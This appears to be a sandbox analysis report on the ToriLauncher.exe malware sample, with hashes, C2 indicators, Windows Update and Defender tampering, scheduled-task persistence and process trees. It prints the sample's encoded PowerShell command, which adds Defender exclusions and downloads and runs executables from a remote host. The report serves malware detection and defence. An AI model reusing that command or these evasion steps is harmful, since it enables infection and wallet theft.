aurora | 127aa2f0bbd871bc946d3b9cdc909702b0884bedcf77fd893d3de56e9e980d1d

Analysis

max time kernel
131s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
19-04-2023 16:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ToriLauncher.exe
Size

15KB
MD5

8a25dfc69da1d9d86fd6b6aa54ce7fb9
SHA1

e1448945d8218944eee8828a387faeeafcddcdd3
SHA256

8a47dfd07adaaefcdb36c9ca7453c240dfe10c3dd4fa0e87f5c9769b7c48a5f1
SHA512

63dbe47828d49f88a15c39499b73a699622a8a8ceeebe71c81aad95628d09c53353c6c4ff7431b688e569facd0582c40a6609b15aee150ff1e7b4082c97fae8a
SSDEEP

384:n8rbishHxlUvJCB2NdCBhNokwVcqDkiCBYkMNt//ZNt/+4Nt/UVRD59KUC9u:nib5hxlUvJCB2NdCBhNokwVcqDkiCBYh

Score

10^/10

aurora dcrat laplas clipper evasion infostealer rat stealer

Malware Config

Extracted

Family

laplas

clipper.guru

Attributes

api_key
5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e

Extracted

Family

aurora

185.239.239.194:8081

Signatures

Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Laplas Clipper
Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.
stealer clipper laplas

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe

Process spawned unexpected child process 21 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	216	4984	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1964	4984	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3360	4984	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3672	4984	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3760	4984	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5108	4984	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4224	4984	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5072	4984	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1508	4984	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	852	4984	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1236	4984	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2052	4984	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3900	4984	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1580	4984	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2512	4984	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4756	4984	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1844	4984	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2656	4984	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4828	4984	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3520	4984	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3152	4984	schtasks.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

Processes:

LicGet.exe

description	pid	process	target process
PID 448 created 3144	448	LicGet.exe	Explorer.EXE
PID 448 created 3144	448	LicGet.exe	Explorer.EXE
PID 448 created 3144	448	LicGet.exe	Explorer.EXE
PID 448 created 3144	448	LicGet.exe	Explorer.EXE
PID 448 created 3144	448	LicGet.exe	Explorer.EXE

DCRat payload 12 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\LicOutput.exe	dcrat
C:\Users\Admin\AppData\Local\Temp\LicOutput.exe	dcrat
C:\Users\Admin\AppData\Local\Temp\LicOutput.exe	dcrat
C:\agentBrowsersavesRefBroker\SurrogateDll.exe	dcrat
C:\agentBrowsersavesRefBroker\SurrogateDll.exe	dcrat
behavioral2/memory/4204-240-0x0000000000370000-0x0000000000530000-memory.dmp	dcrat
C:\agentBrowsersavesRefBroker\sihost.exe	dcrat
C:\agentBrowsersavesRefBroker\RCX1DAF.tmp	dcrat
C:\Recovery\WindowsRE\cmd.exe	dcrat
C:\Recovery\WindowsRE\cmd.exe	dcrat
C:\Recovery\WindowsRE\cmd.exe	dcrat
C:\Users\Admin\AppData\Local\Temp\16dc12fcdc88c18a62bdab1ff6f79c8bf175bb67.exe	dcrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

27 392 powershell.exe
Downloads MZ/PE file

flow	pid	process
27	392	powershell.exe

Drops file in Drivers directory 2 IoCs

Processes:

LicGet.exeSurrogateDll.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	LicGet.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	SurrogateDll.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

LicOutput.exeWScript.exeSurrogateDll.execmd.execmd.exeToriLauncher.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	LicOutput.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	SurrogateDll.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	ToriLauncher.exe

Executes dropped EXE 8 IoCs

Processes:

Syshost.exeLicGet.exeLicCheck.exeLicOutput.exeSurrogateDll.execmd.exeMeWIPLCRzw.execmd.exe

pid process

556 Syshost.exe
448 LicGet.exe
4792 LicCheck.exe
1432 LicOutput.exe
4204 SurrogateDll.exe
4696 cmd.exe
2336 MeWIPLCRzw.exe
400 cmd.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

pid	process
556	Syshost.exe
448	LicGet.exe
4792	LicCheck.exe
1432	LicOutput.exe
4204	SurrogateDll.exe
4696	cmd.exe
2336	MeWIPLCRzw.exe
400	cmd.exe

Drops file in Program Files directory 15 IoCs

Processes:

SurrogateDll.exe

description	ioc	process
File created	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\smss.exe	SurrogateDll.exe
File created	C:\Program Files (x86)\Windows Defender\fr-FR\5b884080fd4f94	SurrogateDll.exe
File created	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\69ddcba757bf72	SurrogateDll.exe
File opened for modification	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\smss.exe	SurrogateDll.exe
File created	C:\Program Files\Microsoft Office 15\lsass.exe	SurrogateDll.exe
File opened for modification	C:\Program Files\Microsoft Office 15\RCX1FD2.tmp	SurrogateDll.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\RCX2896.tmp	SurrogateDll.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\RCX2876.tmp	SurrogateDll.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe	SurrogateDll.exe
File created	C:\Program Files\Microsoft Office 15\6203df4a6bafc7	SurrogateDll.exe
File created	C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe	SurrogateDll.exe
File opened for modification	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\RCX1B79.tmp	SurrogateDll.exe
File opened for modification	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\RCX1B8A.tmp	SurrogateDll.exe
File opened for modification	C:\Program Files\Microsoft Office 15\RCX1FE3.tmp	SurrogateDll.exe
File opened for modification	C:\Program Files\Microsoft Office 15\lsass.exe	SurrogateDll.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

3992 sc.exe
4816 sc.exe
4800 sc.exe
5048 sc.exe
3492 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
3992	sc.exe
4816	sc.exe
4800	sc.exe
5048	sc.exe
3492	sc.exe

Creates scheduled task(s) 1 TTPs 22 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

pid	process
4496	schtasks.exe
3760	schtasks.exe
852	schtasks.exe
2052	schtasks.exe
4756	schtasks.exe
3520	schtasks.exe
5108	schtasks.exe
3672	schtasks.exe
4224	schtasks.exe
3900	schtasks.exe
3152	schtasks.exe
216	schtasks.exe
1964	schtasks.exe
3360	schtasks.exe
5072	schtasks.exe
1508	schtasks.exe
1236	schtasks.exe
1580	schtasks.exe
2512	schtasks.exe
1844	schtasks.exe
2656	schtasks.exe
4828	schtasks.exe

GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 70 Go-http-client/1.1

description	flow	ioc
HTTP User-Agent header	70	Go-http-client/1.1

Modifies registry class 4 IoCs

Processes:

SurrogateDll.execmd.execmd.exeLicOutput.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings	SurrogateDll.exe
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings	LicOutput.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeLicGet.exepowershell.exepowershell.exeSurrogateDll.exe

pid	process
392	powershell.exe
392	powershell.exe
2616	powershell.exe
2616	powershell.exe
448	LicGet.exe
448	LicGet.exe
3368	powershell.exe
3368	powershell.exe
448	LicGet.exe
448	LicGet.exe
448	LicGet.exe
448	LicGet.exe
448	LicGet.exe
448	LicGet.exe
3988	powershell.exe
3988	powershell.exe
448	LicGet.exe
448	LicGet.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe
4204	SurrogateDll.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

ToriLauncher.exepowershell.exepowershell.exepowershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	2620	ToriLauncher.exe
Token: SeDebugPrivilege	392	powershell.exe
Token: SeDebugPrivilege	2616	powershell.exe
Token: SeDebugPrivilege	3368	powershell.exe
Token: SeShutdownPrivilege	4976	powercfg.exe
Token: SeCreatePagefilePrivilege	4976	powercfg.exe
Token: SeDebugPrivilege	3988	powershell.exe
Token: SeShutdownPrivilege	4760	powercfg.exe
Token: SeCreatePagefilePrivilege	4760	powercfg.exe
Token: SeShutdownPrivilege	4320	powercfg.exe
Token: SeCreatePagefilePrivilege	4320	powercfg.exe
Token: SeShutdownPrivilege	3460	powercfg.exe
Token: SeCreatePagefilePrivilege	3460	powercfg.exe
Token: SeIncreaseQuotaPrivilege	3988	powershell.exe
Token: SeSecurityPrivilege	3988	powershell.exe
Token: SeTakeOwnershipPrivilege	3988	powershell.exe
Token: SeLoadDriverPrivilege	3988	powershell.exe
Token: SeSystemProfilePrivilege	3988	powershell.exe
Token: SeSystemtimePrivilege	3988	powershell.exe
Token: SeProfSingleProcessPrivilege	3988	powershell.exe
Token: SeIncBasePriorityPrivilege	3988	powershell.exe
Token: SeCreatePagefilePrivilege	3988	powershell.exe
Token: SeBackupPrivilege	3988	powershell.exe
Token: SeRestorePrivilege	3988	powershell.exe
Token: SeShutdownPrivilege	3988	powershell.exe
Token: SeDebugPrivilege	3988	powershell.exe
Token: SeSystemEnvironmentPrivilege	3988	powershell.exe
Token: SeRemoteShutdownPrivilege	3988	powershell.exe
Token: SeUndockPrivilege	3988	powershell.exe
Token: SeManageVolumePrivilege	3988	powershell.exe
Token: 33	3988	powershell.exe
Token: 34	3988	powershell.exe
Token: 35	3988	powershell.exe
Token: 36	3988	powershell.exe
Token: SeIncreaseQuotaPrivilege	3988	powershell.exe
Token: SeSecurityPrivilege	3988	powershell.exe
Token: SeTakeOwnershipPrivilege	3988	powershell.exe
Token: SeLoadDriverPrivilege	3988	powershell.exe
Token: SeSystemProfilePrivilege	3988	powershell.exe
Token: SeSystemtimePrivilege	3988	powershell.exe
Token: SeProfSingleProcessPrivilege	3988	powershell.exe
Token: SeIncBasePriorityPrivilege	3988	powershell.exe
Token: SeCreatePagefilePrivilege	3988	powershell.exe
Token: SeBackupPrivilege	3988	powershell.exe
Token: SeRestorePrivilege	3988	powershell.exe
Token: SeShutdownPrivilege	3988	powershell.exe
Token: SeDebugPrivilege	3988	powershell.exe
Token: SeSystemEnvironmentPrivilege	3988	powershell.exe
Token: SeRemoteShutdownPrivilege	3988	powershell.exe
Token: SeUndockPrivilege	3988	powershell.exe
Token: SeManageVolumePrivilege	3988	powershell.exe
Token: 33	3988	powershell.exe
Token: 34	3988	powershell.exe
Token: 35	3988	powershell.exe
Token: 36	3988	powershell.exe
Token: SeIncreaseQuotaPrivilege	3988	powershell.exe
Token: SeSecurityPrivilege	3988	powershell.exe
Token: SeTakeOwnershipPrivilege	3988	powershell.exe
Token: SeLoadDriverPrivilege	3988	powershell.exe
Token: SeSystemProfilePrivilege	3988	powershell.exe
Token: SeSystemtimePrivilege	3988	powershell.exe
Token: SeProfSingleProcessPrivilege	3988	powershell.exe
Token: SeIncBasePriorityPrivilege	3988	powershell.exe
Token: SeCreatePagefilePrivilege	3988	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ToriLauncher.exepowershell.execmd.execmd.exeLicOutput.execmd.exeWScript.execmd.exeSyshost.execmd.exeSurrogateDll.exe

description	pid	process	target process
PID 2620 wrote to memory of 392	2620	ToriLauncher.exe	powershell.exe
PID 2620 wrote to memory of 392	2620	ToriLauncher.exe	powershell.exe
PID 392 wrote to memory of 2616	392	powershell.exe	powershell.exe
PID 392 wrote to memory of 2616	392	powershell.exe	powershell.exe
PID 392 wrote to memory of 556	392	powershell.exe	Syshost.exe
PID 392 wrote to memory of 556	392	powershell.exe	Syshost.exe
PID 392 wrote to memory of 556	392	powershell.exe	Syshost.exe
PID 392 wrote to memory of 448	392	powershell.exe	LicGet.exe
PID 392 wrote to memory of 448	392	powershell.exe	LicGet.exe
PID 392 wrote to memory of 4792	392	powershell.exe	LicCheck.exe
PID 392 wrote to memory of 4792	392	powershell.exe	LicCheck.exe
PID 392 wrote to memory of 1432	392	powershell.exe	LicOutput.exe
PID 392 wrote to memory of 1432	392	powershell.exe	LicOutput.exe
PID 392 wrote to memory of 1432	392	powershell.exe	LicOutput.exe
PID 2568 wrote to memory of 4976	2568	cmd.exe	powercfg.exe
PID 2568 wrote to memory of 4976	2568	cmd.exe	powercfg.exe
PID 3252 wrote to memory of 4800	3252	cmd.exe	sc.exe
PID 3252 wrote to memory of 4800	3252	cmd.exe	sc.exe
PID 2568 wrote to memory of 4760	2568	cmd.exe	powercfg.exe
PID 2568 wrote to memory of 4760	2568	cmd.exe	powercfg.exe
PID 3252 wrote to memory of 5048	3252	cmd.exe	sc.exe
PID 3252 wrote to memory of 5048	3252	cmd.exe	sc.exe
PID 2568 wrote to memory of 4320	2568	cmd.exe	powercfg.exe
PID 2568 wrote to memory of 4320	2568	cmd.exe	powercfg.exe
PID 3252 wrote to memory of 3492	3252	cmd.exe	sc.exe
PID 3252 wrote to memory of 3492	3252	cmd.exe	sc.exe
PID 2568 wrote to memory of 3460	2568	cmd.exe	powercfg.exe
PID 2568 wrote to memory of 3460	2568	cmd.exe	powercfg.exe
PID 3252 wrote to memory of 3992	3252	cmd.exe	sc.exe
PID 3252 wrote to memory of 3992	3252	cmd.exe	sc.exe
PID 3252 wrote to memory of 4816	3252	cmd.exe	sc.exe
PID 3252 wrote to memory of 4816	3252	cmd.exe	sc.exe
PID 3252 wrote to memory of 4860	3252	cmd.exe	reg.exe
PID 3252 wrote to memory of 4860	3252	cmd.exe	reg.exe
PID 3252 wrote to memory of 4316	3252	cmd.exe	reg.exe
PID 3252 wrote to memory of 4316	3252	cmd.exe	reg.exe
PID 3252 wrote to memory of 3560	3252	cmd.exe	reg.exe
PID 3252 wrote to memory of 3560	3252	cmd.exe	reg.exe
PID 3252 wrote to memory of 1324	3252	cmd.exe	reg.exe
PID 3252 wrote to memory of 1324	3252	cmd.exe	reg.exe
PID 1432 wrote to memory of 384	1432	LicOutput.exe	WScript.exe
PID 1432 wrote to memory of 384	1432	LicOutput.exe	WScript.exe
PID 1432 wrote to memory of 384	1432	LicOutput.exe	WScript.exe
PID 3252 wrote to memory of 4784	3252	cmd.exe	reg.exe
PID 3252 wrote to memory of 4784	3252	cmd.exe	reg.exe
PID 3744 wrote to memory of 2056	3744	cmd.exe	choice.exe
PID 3744 wrote to memory of 2056	3744	cmd.exe	choice.exe
PID 384 wrote to memory of 4560	384	WScript.exe	cmd.exe
PID 384 wrote to memory of 4560	384	WScript.exe	cmd.exe
PID 384 wrote to memory of 4560	384	WScript.exe	cmd.exe
PID 4560 wrote to memory of 4204	4560	cmd.exe	SurrogateDll.exe
PID 4560 wrote to memory of 4204	4560	cmd.exe	SurrogateDll.exe
PID 556 wrote to memory of 764	556	Syshost.exe	cmd.exe
PID 556 wrote to memory of 764	556	Syshost.exe	cmd.exe
PID 556 wrote to memory of 764	556	Syshost.exe	cmd.exe
PID 764 wrote to memory of 4496	764	cmd.exe	schtasks.exe
PID 764 wrote to memory of 4496	764	cmd.exe	schtasks.exe
PID 764 wrote to memory of 4496	764	cmd.exe	schtasks.exe
PID 4204 wrote to memory of 4040	4204	SurrogateDll.exe	powershell.exe
PID 4204 wrote to memory of 4040	4204	SurrogateDll.exe	powershell.exe
PID 4204 wrote to memory of 4140	4204	SurrogateDll.exe	powershell.exe
PID 4204 wrote to memory of 4140	4204	SurrogateDll.exe	powershell.exe
PID 4204 wrote to memory of 1432	4204	SurrogateDll.exe	powershell.exe
PID 4204 wrote to memory of 1432	4204	SurrogateDll.exe	powershell.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\ToriLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\ToriLauncher.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAZQBjACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHcAZQBkACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUALwBTAGUAcgB2AGUAcgAgAGkAcwAgAGEAbABsAG8AdwBlAGQAIQAgAFQAcgB5ACAAbwBuACAAYQBuAG8AdABoAGUAcgAgAFAAQwAhACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBwAGUAbAAjAD4AOwAiADsAPAAjAHMAdwBnACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbABhAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgB4AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgBhAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGYAZQByADYAMQAxADUANgAvAHQAaABpAHMAaQBzAGYAbwByAGUAZAB1AGMAYQB0AGkAbwBuAGEAbABwAHUAcgBwAG8AcwBlAHMAbwBuAGwAeQAvAHIAYQB3AC8AYgBjADEAOAA1ADUAMwBhAGYAMgA4ADYAMQA1ADQAMwBiADQAMAA2AGIAMABjAGEAOQA2ADcAZAAxAGYAZgA0ADgANQAwADEAZgA4ADYAYQAvAEMATABFAFAALgBlAHgAZQAnACwAIAA8ACMAaABnAHAAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBrAHMAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAHoAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBoAG8AcwB0AC4AZQB4AGUAJwApACkAPAAjAHkAYwB5ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGYAZQByADYAMQAxADUANgAvAHQAaABpAHMAaQBzAGYAbwByAGUAZAB1AGMAYQB0AGkAbwBuAGEAbABwAHUAcgBwAG8AcwBlAHMAbwBuAGwAeQAvAHIAYQB3AC8AYgBjADEAOAA1ADUAMwBhAGYAMgA4ADYAMQA1ADQAMwBiADQAMAA2AGIAMABjAGEAOQA2ADcAZAAxAGYAZgA0ADgANQAwADEAZgA4ADYAYQAvAEQARQBWAE0AaQBuAC4AZQB4AGUAJwAsACAAPAAjAHMAZwBoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcABhAGwAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcwBmAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMARwBlAHQALgBlAHgAZQAnACkAKQA8ACMAcABhAGoAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGwAdQBjAGkAZgBlAHIANgAxADEANQA2AC8AdABoAGkAcwBpAHMAZgBvAHIAZQBkAHUAYwBhAHQAaQBvAG4AYQBsAHAAdQByAHAAbwBzAGUAcwBvAG4AbAB5AC8AcgBhAHcALwBiAGMAMQA4ADUANQAzAGEAZgAyADgANgAxADUANAAzAGIANAAwADYAYgAwAGMAYQA5ADYANwBkADEAZgBmADQAOAA1ADAAMQBmADgANgBhAC8ARABlAHYAUwB0AC4AZQB4AGUAJwAsACAAPAAjAHIAegB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbABwAGUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcgBlAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAQwBoAGUAYwBrAC4AZQB4AGUAJwApACkAPAAjAGsAeABtACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGYAZQByADYAMQAxADUANgAvAHQAaABpAHMAaQBzAGYAbwByAGUAZAB1AGMAYQB0AGkAbwBuAGEAbABwAHUAcgBwAG8AcwBlAHMAbwBuAGwAeQAvAHIAYQB3AC8AYgBjADEAOAA1ADUAMwBhAGYAMgA4ADYAMQA1ADQAMwBiADQAMAA2AGIAMABjAGEAOQA2ADcAZAAxAGYAZgA0ADgANQAwADEAZgA4ADYAYQAvAGQAZQB2AGEAbAB0AC4AZQB4AGUAJwAsACAAPAAjAHEAagBiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbgB4AHoAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcgByAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMATwB1AHQAcAB1AHQALgBlAHgAZQAnACkAKQA8ACMAdAB1AHAAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgB0AGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGMAagBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAGgAbwBzAHQALgBlAHgAZQAnACkAPAAjAHUAawBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAd